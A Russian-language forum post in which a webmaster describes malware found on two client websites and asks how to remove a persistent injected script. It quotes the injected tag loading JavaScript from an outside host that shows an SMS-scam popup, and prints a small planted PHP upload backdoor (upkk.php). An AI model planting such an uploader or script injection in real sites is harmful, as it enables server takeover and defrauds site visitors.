На 2х сайтов обнаружил вирусы. Помогите удалить!

Доброго времени суток.

В общем дело такое.

Сегодня на 2-х клиентских сайтах был обнаружен один и тот же вирус.

На главной странице в конце вызывается яваскрипт

<script language='JavaScript' src='http://uni33.ru/codenj.php?codenj=23311'></script> 

На других страницах - вызывается следующий яваскрипт

<script src="admin/includes/javascript/json.js"></script>

Делает он следующее: в случае если в куках нет записей о сайте - всплывает окно по верх страницы с предложением отправить смс...

Начал искать на фтп файлы со свежей датой последнего изменения. Нашел 2 файла

1.upkk.php

Содержание:

<?php
    if(isset($_FILES['upkk']['tmp_name'])){
        @mkdir("kk", 0777);
        copy($_FILES['upkk']['tmp_name'],"kk/".basename($_FILES['upkk']['name']));
    }
?> 

2. json.js

Содержание длинное, но смысл - вызвать всплывающее окно.

После их удаления всплывающее окно разумеется не вызывается, но

на главной так и осталось:

<script language='JavaScript' src='http://uni33.ru/codenj.php?codenj=23311'></script> 

Подскажите пожалуйста как мне найти откуда эта строчка подгружается? Все файлы с недавней датой я просмотрел. Их было не много. в основном сессии и файлы кеша. Их по удалял тоже.

больше свежих файлов нет.

Может эта строчка из базы как-то вызываться?

Один из пациентов: mokusha.ru

PS. Забыл добавить. Хостинг у обоих сайтов один, сайты на разных движках, базы разные, пользователи баз разные, доступы по фтп разные.

В панельке хостинга смотрел историю заходов. Ничего особенного не увидел. Заходы старые. и все с одной подсети, моей или клиентской.